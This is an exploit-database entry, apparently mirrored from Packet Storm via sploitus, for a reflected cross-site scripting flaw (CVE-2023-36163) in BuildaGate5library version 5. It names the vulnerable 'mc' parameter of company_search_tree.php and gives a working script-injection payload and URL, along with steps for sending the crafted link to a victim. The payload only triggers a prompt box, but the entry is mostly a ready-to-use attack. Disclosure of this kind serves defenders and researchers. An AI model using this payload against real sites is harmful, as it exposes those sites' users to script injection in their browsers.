Share
## https://sploitus.com/exploit?id=PACKETSTORM:173366
# Exploit Title: BuildaGate5library - Reflected Cross-Site Scripting (XSS)  
# Date: 06/07/2023  
# Exploit Author: Idan Malihi  
# Vendor Homepage: None  
# Version: 5  
# Tested on: Microsoft Windows 10 Pro  
# CVE : CVE-2023-36163  
  
#PoC:  
An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like:  
'><script>prompt("XSS");</script><div id="aa  
  
After that, the attacker needs to send the full URL with the JS code to the victim and inject their browser.  
  
#Payload:  
company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa